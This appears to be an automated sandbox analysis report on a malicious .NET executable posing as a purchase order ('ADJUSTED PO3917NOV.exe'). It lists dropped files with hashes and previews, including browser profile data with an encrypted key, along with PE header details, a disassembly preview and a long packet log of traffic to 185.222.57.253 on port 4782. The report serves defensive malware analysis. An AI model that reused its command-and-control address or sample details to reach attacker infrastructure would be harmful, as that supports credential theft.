SSDEEP:	48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
MD5:	81DB1710BB13DA3343FC0DF9F00BE49F
SHA1:	9B1F17E936D28684FFDFA962340C8872512270BB
SHA-256:	9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
SHA-512:	CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Knptwsn.tmp Download File
Process:	C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	87165
Entropy (8bit):	6.102565506017432
Encrypted:	false
SSDEEP:	1536:S9sfGRcZdJiXrXafIyYOetKdapZsyTwL3cDGOLN0nTwY/A3iuR+:SsfFcbXafIB0u1GOJmA3iuR+
MD5:	CC02ABB348037609ED09EC9157D55234
SHA1:	32411A59960ECF4D7434232194A5B3DB55817647
SHA-256:	62E0236494260F5C9FFF1C4DBF1A57C66B28A5ABE1ACF21B26D08235C735C7D8
SHA-512:	AC95705ED369D82B65200354E10875F6AD5EBC4E0F9FFC61AE6C45C32410B6F55D4C47B219BA4722B6E15C34AC57F91270581DB0A391711D70AF376170DE2A35
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	{"browser":{"last_redirect_origin":"","shortcut_migration_version":"85.0.4183.121"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en"},"legacy":{"profile":{"name":{"migrated":true}}},"network_time":{"network_time_mapping":{"local":1.601478090199719e+12,"network":1.601453434e+12,"ticks":826153657.0,"uncertainty":4457158.0}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABL95WKt94zTZq03WydzHLcAAAAAAIAAAAAABBmAAAAAQAAIAAAABAL2tyan+lsWtxhoUVdUYrYiwg8iJkppNr2ZbBFie9UAAAAAA6AAAAAAgAAIAAAABDv4gjLq1dOS7lkRG21YVXojnHhsRhNbP8/D1zs78mXMAAAAB045Od5v4BxiFP4bdRYJjDXn4W2fxYqQj2xfYeAnS1vCL4JXAsdfljw4oXIE4R7l0AAAABlt36FqChftM9b7EtaPw98XRX5Y944rq1WsGWcOPFyXOajfBL3GXBUhMXghJbDGb5WCu+JEdxaxLLxaYPp4zeP"},"password_manager":{"os_password_blank":true,"os_password_last_changed":"13245951016607996"},"plugins":{"metadata":{"adobe-flash-player":{"disp

C:\Users\user\AppData\Roaming\QUQovKcaZRcNZ.exe Download File
Process:	C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	963072
Entropy (8bit):	6.000080999689837
Encrypted:	false
SSDEEP:	6144:KMs+2EfXXT4uWtf5YTZkUPTUTsTlNOsk4F8d5JF4Nydla+4dZN0lTwI:Kk/DeV5YTZHPTesTW5JF4MN4dU1wI
MD5:	EC46F95F234B89325E198104D1887B1C
SHA1:	D0600CDB17F86F31EFF130D029A87717FDE2CC7A
SHA-256:	01BBEF21BEA94B6EC60C739DF3E40E887CF0EA1DF7BA2F1678CE708BA10A6203
SHA-512:	C3207A8C9C4639A40AD72308C7AA6710C78C4AC014704CF6675AD7D724CFDBA9D7A0AFD292E7B133EEB964342A1B0988A6CFC8C24D0EB84A43787405227968EB
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 29%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...p.a..............0..............+... ...@....@.. ....................... ............@.................................D+..O....@.. ............................................................................ ............... ..H............text........ ...................... ..`.rsrc... ....@......................@..@.reloc..............................@..B................x+......H........T...R......}.......P.............................................{.....0..-..........6...%..~.o...........%.r...p.%.r?..p.%...J.rU..p}.....(.....0...........rU..p}.....(......}......}.....9.....o.....3V..+...o....~e.....3...}....+...X..~e....i2...+...o....~f.....3...}....+...X..~f....i2..{....-..rU..p(....,...}......+..~g.....(....,...}......X..~g....i2...{.......0..x.......rU..p..{.......YE................,...+8.rW..p(.....+6.rg..p(.....+(.r}..p(.....+..r...p(

C:\Users\user\AppData\Roaming\QUQovKcaZRcNZ.exe:Zone.Identifier Download File
Process:	C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	false
Reputation:	high, very likely benign file
Preview:	[ZoneTransfer]....ZoneId=0

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	6.000080999689837
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	ADJUSTED PO3917NOV.exe
File size:	963072
MD5:	ec46f95f234b89325e198104d1887b1c
SHA1:	d0600cdb17f86f31eff130d029a87717fde2cc7a
SHA256:	01bbef21bea94b6ec60c739df3e40e887cf0ea1df7ba2f1678ce708ba10a6203
SHA512:	c3207a8c9c4639a40ad72308c7aa6710c78c4ac014704cf6675ad7d724cfdba9d7a0afd292e7b133eeb964342a1b0988a6cfc8c24d0eb84a43787405227968eb
SSDEEP:	6144:KMs+2EfXXT4uWtf5YTZkUPTUTsTlNOsk4F8d5JF4Nydla+4dZN0lTwI:Kk/DeV5YTZHPTesTW5JF4MN4dU1wI
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...p..a..............0..............+... ...@....@.. ....................... ............@................................

File Icon


Icon Hash:	f0f0faf2e8ccb48a

Static PE Info

General
Entrypoint:	0x482b96
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics:	NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x6181EE70 [Wed Nov 3 02:05:36 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:	v4.0.30319
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
sub byte ptr [eax], al
sub dword ptr [eax], eax
cmp eax, 2B000000h
add byte ptr [2F002A00h], ch
add byte ptr [00005E00h], ah
add byte ptr [eax], al
add byte ptr [ebx], ch
add byte ptr [2F002A00h], ch
add byte ptr [28005E00h], ah
add byte ptr [ecx], ch
add byte ptr [eax], ah
add byte ptr [00000000h], bh
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x82b44	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x84000	0x6a120	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xf0000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x80bcc	0x80c00	False	0.561988015777	data	6.21831911022	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rsrc	0x84000	0x6a120	0x6a200	False	0.121188070524	data	5.17746746332	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xf0000	0xc	0x200	False	0.044921875	data	0.101910425663	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type
RT_ICON	0x842e0	0x42028	dBase IV DBT, blocks size 0, block length 8192, next free block index 40, next free block 0, next used block 0
RT_ICON	0xc6308	0x10828	dBase IV DBT, blocks size 0, block length 2048, next free block index 40, next free block 0, next used block 0
RT_ICON	0xd6b30	0x94a8	data
RT_ICON	0xdffd8	0x5488	data
RT_ICON	0xe5460	0x4228	dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 248, next used block 520093696
RT_ICON	0xe9688	0x25a8	data
RT_ICON	0xebc30	0x10a8	data
RT_ICON	0xeccd8	0x988	data
RT_ICON	0xed660	0x468	GLS_BINARY_LSB_FIRST
RT_GROUP_ICON	0xedac8	0x84	data
RT_GROUP_ICON	0xedb4c	0x84	data
RT_VERSION	0xedbd0	0x364	data
RT_MANIFEST	0xedf34	0x1ea	XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

Imports

DLL	Import
mscoree.dll	_CorExeMain

Version Infos

Description	Data
Translation	0x0000 0x04b0
LegalCopyright	Copyright 2008
Assembly Version	1.0.0.0
InternalName	En.exe
FileVersion	1.0.0.0
CompanyName
LegalTrademarks
Comments
ProductName	cs276_bjt_11--2008_hashFunctions
ProductVersion	1.0.0.0
FileDescription	cs276_bjt_11--2008_hashFunctions
OriginalFilename	En.exe

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 3, 2021 13:24:30.335695982 CET	49741	4782	192.168.2.3	185.222.57.253
Nov 3, 2021 13:24:30.359518051 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:30.359672070 CET	49741	4782	192.168.2.3	185.222.57.253
Nov 3, 2021 13:24:30.384587049 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:30.430227995 CET	49741	4782	192.168.2.3	185.222.57.253
Nov 3, 2021 13:24:30.494748116 CET	49741	4782	192.168.2.3	185.222.57.253
Nov 3, 2021 13:24:30.573896885 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:30.589350939 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:30.597136974 CET	49741	4782	192.168.2.3	185.222.57.253
Nov 3, 2021 13:24:30.644506931 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:30.644562960 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:30.644604921 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:30.644644022 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:30.644673109 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:30.644691944 CET	49741	4782	192.168.2.3	185.222.57.253
Nov 3, 2021 13:24:30.644736052 CET	49741	4782	192.168.2.3	185.222.57.253
Nov 3, 2021 13:24:30.667337894 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:30.667428017 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:30.667557001 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:30.667604923 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:30.667642117 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:30.667669058 CET	49741	4782	192.168.2.3	185.222.57.253
Nov 3, 2021 13:24:30.667680025 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:30.667691946 CET	49741	4782	192.168.2.3	185.222.57.253
Nov 3, 2021 13:24:30.667717934 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:30.667725086 CET	49741	4782	192.168.2.3	185.222.57.253
Nov 3, 2021 13:24:30.667753935 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:30.667784929 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:30.667890072 CET	49741	4782	192.168.2.3	185.222.57.253
Nov 3, 2021 13:24:30.690375090 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:30.690428972 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:30.690469027 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:30.690501928 CET	49741	4782	192.168.2.3	185.222.57.253
Nov 3, 2021 13:24:30.690509081 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:30.690548897 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:30.690552950 CET	49741	4782	192.168.2.3	185.222.57.253
Nov 3, 2021 13:24:30.690589905 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:30.690628052 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:30.690639019 CET	49741	4782	192.168.2.3	185.222.57.253
Nov 3, 2021 13:24:30.690666914 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:30.690706015 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:30.690742970 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:30.690782070 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:30.690812111 CET	49741	4782	192.168.2.3	185.222.57.253
Nov 3, 2021 13:24:30.690818071 CET	49741	4782	192.168.2.3	185.222.57.253
Nov 3, 2021 13:24:30.690823078 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:30.690865040 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:30.690877914 CET	49741	4782	192.168.2.3	185.222.57.253
Nov 3, 2021 13:24:30.690905094 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:30.690943956 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:30.690954924 CET	49741	4782	192.168.2.3	185.222.57.253
Nov 3, 2021 13:24:30.690983057 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:30.691010952 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:30.691243887 CET	49741	4782	192.168.2.3	185.222.57.253
Nov 3, 2021 13:24:30.713630915 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:30.713690996 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:30.713732958 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:30.713772058 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:30.713812113 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:30.713813066 CET	49741	4782	192.168.2.3	185.222.57.253
Nov 3, 2021 13:24:30.713829041 CET	49741	4782	192.168.2.3	185.222.57.253
Nov 3, 2021 13:24:30.713854074 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:30.713896036 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:30.713933945 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:30.713973045 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:30.713979959 CET	49741	4782	192.168.2.3	185.222.57.253
Nov 3, 2021 13:24:30.713984013 CET	49741	4782	192.168.2.3	185.222.57.253
Nov 3, 2021 13:24:30.714013100 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:30.714052916 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:30.714091063 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:30.714128017 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:30.714129925 CET	49741	4782	192.168.2.3	185.222.57.253
Nov 3, 2021 13:24:30.714138031 CET	49741	4782	192.168.2.3	185.222.57.253
Nov 3, 2021 13:24:30.714168072 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:30.714209080 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:30.714246988 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:30.714260101 CET	49741	4782	192.168.2.3	185.222.57.253
Nov 3, 2021 13:24:30.714286089 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:30.714325905 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:30.714365005 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:30.714378119 CET	49741	4782	192.168.2.3	185.222.57.253
Nov 3, 2021 13:24:30.714384079 CET	49741	4782	192.168.2.3	185.222.57.253
Nov 3, 2021 13:24:30.714407921 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:30.714446068 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:30.714487076 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:30.714487076 CET	49741	4782	192.168.2.3	185.222.57.253
Nov 3, 2021 13:24:30.714528084 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:30.714565992 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:30.714570045 CET	49741	4782	192.168.2.3	185.222.57.253
Nov 3, 2021 13:24:30.714605093 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:30.714643955 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:30.714648962 CET	49741	4782	192.168.2.3	185.222.57.253
Nov 3, 2021 13:24:30.714682102 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:30.714720964 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:30.714745045 CET	49741	4782	192.168.2.3	185.222.57.253
Nov 3, 2021 13:24:30.714749098 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:30.714790106 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:30.714829922 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:30.714868069 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:30.714869976 CET	49741	4782	192.168.2.3	185.222.57.253
Nov 3, 2021 13:24:30.714906931 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:30.714909077 CET	49741	4782	192.168.2.3	185.222.57.253
Nov 3, 2021 13:24:30.714935064 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:30.714947939 CET	49741	4782	192.168.2.3	185.222.57.253
Nov 3, 2021 13:24:30.737571001 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:30.737606049 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:30.737643003 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:30.737674952 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:30.737699986 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:30.737720966 CET	49741	4782	192.168.2.3	185.222.57.253
Nov 3, 2021 13:24:30.737730980 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:30.737737894 CET	49741	4782	192.168.2.3	185.222.57.253
Nov 3, 2021 13:24:30.737759113 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:30.737772942 CET	49741	4782	192.168.2.3	185.222.57.253
Nov 3, 2021 13:24:30.737788916 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:30.737814903 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:30.737832069 CET	49741	4782	192.168.2.3	185.222.57.253
Nov 3, 2021 13:24:30.737847090 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:30.737873077 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:30.737903118 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:30.737929106 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:30.737946033 CET	49741	4782	192.168.2.3	185.222.57.253
Nov 3, 2021 13:24:30.737950087 CET	49741	4782	192.168.2.3	185.222.57.253
Nov 3, 2021 13:24:30.737961054 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:30.737987041 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:30.738017082 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:30.738033056 CET	49741	4782	192.168.2.3	185.222.57.253
Nov 3, 2021 13:24:30.738044024 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:30.738075018 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:30.738099098 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:30.738101959 CET	49741	4782	192.168.2.3	185.222.57.253
Nov 3, 2021 13:24:30.738128901 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:30.738132954 CET	49741	4782	192.168.2.3	185.222.57.253
Nov 3, 2021 13:24:30.738154888 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:30.738182068 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:30.738209963 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:30.738234043 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:30.738255978 CET	49741	4782	192.168.2.3	185.222.57.253
Nov 3, 2021 13:24:30.738259077 CET	49741	4782	192.168.2.3	185.222.57.253
Nov 3, 2021 13:24:30.738269091 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:30.738291979 CET	49741	4782	192.168.2.3	185.222.57.253
Nov 3, 2021 13:24:30.738306999 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:30.738341093 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:30.738363028 CET	49741	4782	192.168.2.3	185.222.57.253
Nov 3, 2021 13:24:30.738377094 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:30.738413095 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:30.738446951 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:30.738462925 CET	49741	4782	192.168.2.3	185.222.57.253
Nov 3, 2021 13:24:30.738477945 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:30.738508940 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:30.738537073 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:30.738547087 CET	49741	4782	192.168.2.3	185.222.57.253
Nov 3, 2021 13:24:30.738550901 CET	49741	4782	192.168.2.3	185.222.57.253
Nov 3, 2021 13:24:30.738568068 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:30.738595009 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:30.738630056 CET	49741	4782	192.168.2.3	185.222.57.253
Nov 3, 2021 13:24:30.738630056 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:30.738667965 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:30.738696098 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:30.738722086 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:30.738749027 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:30.738764048 CET	49741	4782	192.168.2.3	185.222.57.253
Nov 3, 2021 13:24:30.738768101 CET	49741	4782	192.168.2.3	185.222.57.253
Nov 3, 2021 13:24:30.738782883 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:30.738815069 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:30.738846064 CET	49741	4782	192.168.2.3	185.222.57.253
Nov 3, 2021 13:24:30.738850117 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:30.738878012 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:30.738897085 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:30.738910913 CET	49741	4782	192.168.2.3	185.222.57.253
Nov 3, 2021 13:24:30.738925934 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:30.738955975 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:30.738981009 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:30.738985062 CET	49741	4782	192.168.2.3	185.222.57.253
Nov 3, 2021 13:24:30.739006996 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:30.739026070 CET	49741	4782	192.168.2.3	185.222.57.253
Nov 3, 2021 13:24:30.739026070 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:30.739064932 CET	49741	4782	192.168.2.3	185.222.57.253
Nov 3, 2021 13:24:30.762095928 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:30.762124062 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:30.762140989 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:30.762159109 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:30.762183905 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:30.762201071 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:30.762203932 CET	49741	4782	192.168.2.3	185.222.57.253
Nov 3, 2021 13:24:30.762217999 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:30.762223959 CET	49741	4782	192.168.2.3	185.222.57.253
Nov 3, 2021 13:24:30.762237072 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:30.762254000 CET	4782	49741	185.222.57.253	192.168.2.3
